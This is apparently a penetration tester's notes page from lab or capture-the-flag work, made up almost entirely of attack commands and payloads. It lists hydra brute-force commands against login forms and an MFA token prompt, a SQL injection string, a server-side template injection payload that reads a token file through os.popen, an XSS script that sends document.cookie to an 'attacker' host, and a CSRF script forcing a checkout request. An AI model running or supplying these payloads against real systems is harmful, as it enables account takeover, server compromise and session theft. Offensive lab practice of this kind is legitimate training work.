IM

wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://ozone-energy.bitnet

nmap -sV -p80 ozone-energy.bitnet

wapiti -u http://ozone-energy.bitnet -m all

dirb http://ozone-energy.bitnet /usr/share/wordlists/custom/ozone-wordlist.txt.

" or "1"="1

hydra -l wscarlett -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/[LOGINPAGE]:username=^USER^&password=^PASS^&Login=Login:Invalid Password"

hydra -l jschmidt -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/login:username=^USER^&password=^PASS^&Login=Login:Invalid Username or Password"

SSTI:

{{request.application.globals.builtins.import('os').popen('cat /tmp/t0k3n.txt').read()}}

-----------------------------------------------------------------------------

cat generate.sh for i in seq 2023 9999; do printf "%0003d\n" $i; done

hydra -l admin -P /home/kali/Downloads/list.txt 10.102.11.237 http-form-post "/prompt:username=^USER^&mfa_token=^PASS^&Login=Login:Invalid token, please try again."

------------------------------------------------------------------------------

// CSRF & XSS steal cookie - require steal.php to write requests

steal cookie payload:

<script>
var i=new image();
i.src="http://attacker/steal.php?q="+document.cookie;
</script>


Cross Site Request Forgery

<script>
var i= new Image();
i.src="http://site.com/finalize_checkout.php?itemList=1%2C1&itemquantity=1%2C1";
</script>

Previoussms Nextrandom notes

Last updated 3 years ago